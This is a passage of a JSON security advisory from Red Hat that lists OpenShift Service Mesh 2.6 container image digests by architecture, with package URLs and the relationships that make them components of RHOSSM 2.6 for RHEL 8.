"name": "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"product": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"product_id": "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"product_identification_helper": {
"purl": "pkg:oci/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"product_id": "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9\u0026tag=2.6.2-7"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.6.2-3"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"product": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"product_id": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8\u0026tag=1.89.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"product": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"product_id": "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"product": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"product_id": "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"product_identification_helper": {
"purl": "pkg:oci/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8\u0026tag=2.6.2-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"product": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"product_id": "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8\u0026tag=1.89.4-3"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"product": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"product_id": "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator\u0026tag=1.89.6-1"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"product": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.6.2-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"product": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"product_id": "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"product_id": "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9\u0026tag=2.6.2-7"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.6.2-3"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64"
},
"product_reference": "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x"
},
"product_reference": "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64"
},
"product_reference": "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x"
},
"product_reference": "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le"
},
